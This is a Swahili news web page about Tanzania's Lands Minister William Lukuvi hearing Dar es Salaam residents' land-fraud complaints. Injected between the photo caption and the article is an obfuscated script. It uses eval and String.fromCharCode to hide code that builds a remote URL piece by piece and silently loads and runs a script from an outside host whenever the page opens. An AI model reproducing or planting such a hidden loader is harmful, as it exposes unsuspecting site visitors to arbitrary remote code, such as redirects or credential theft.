<p>Mkazi wa Kigamboni akitoa malalamiko yake ya ardhi mbele ya Waziri wa Ardhji Nyumba na Maendeleo ya Makazi, William Lukuvi</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
WIZARA ya Ardhi, Nyumba na Makazi imesema itahakikisha wananchi wote wenye malalamiko ya ardhi wanasaidiwa kwa kuwashughulikia matapeli na wavamizi wa viwanja na makazi ya watu ikiwa ni pamoja na kubomoa nyumba walizojenga katika maeneo ya dhuluma. Anaandika Hamisi Mguta ⦠(endelea).
Hayo yamesemwa leo katika mwendelezo wa mpango wa kusikiliza kero za wananchi kuhusu maswala ya ardhi kwa upande wa wakazi wa Ilala na Temeke jijini Dar es Salaam ambapo jana zilisikilizwa kero 153 za wakazi wa Kinondoni.
Waziri wa Ardhi, Nyumba na Makazi, Dk. William Lukuvi amesema katika Manispaa ya Kinondoni tatizo kubwa linalosabababisha kero za ardhi ni uvamizi wa maeneo ya wazi na viwanja vya watu pamoja na kuvunjiwa nyumba zao na watu wanaodaiwa kuwa matapeli. Jumla ya watu 28 wamelalamikia tatizo hilo.
Lukuvi amesema kwa yeyote atakayegundulika kuwa amehusika na utapeli atanyangâanywa mali mara moja âtukigundua kwamba ni kweli umehusika suruhisho ni kuvunja nyumba ama kiwanja ulichozurumu.â
Pia amewapa tahadhari matapeli wanaofanyanyia wananchi wanyonge na masikini na kudhani kwamba serikali haipo makini kuangalia kinachoendelea âwatashughulikiwa na hata kama halitaisha kwa siku moja.â
Amesema, jumla ya kero 112 zimepokelewa na na kufikia idadi ya 265 kaunzia jana kwa wananchi wa wilaya zote tatu za Dar es Salaam.
Lukuvi amesisitiza kuwa, atahakikisha kila mwananchi aliyewasilisha kero yake kuhusu ucheleweshaji wa hati za umiliki wa ardhi na nyumba kabla ya Octoba 25.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments